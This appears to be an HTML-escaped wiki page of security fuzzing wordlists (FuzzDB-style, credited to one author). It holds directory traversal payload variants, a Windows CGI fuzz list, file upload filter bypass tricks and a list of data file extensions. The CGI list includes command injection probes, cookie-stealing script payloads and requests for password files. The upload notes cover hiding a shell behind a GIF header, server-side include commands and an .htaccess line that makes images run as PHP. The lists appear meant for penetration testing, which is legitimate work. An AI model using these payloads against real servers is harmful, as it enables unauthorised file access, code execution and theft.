%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
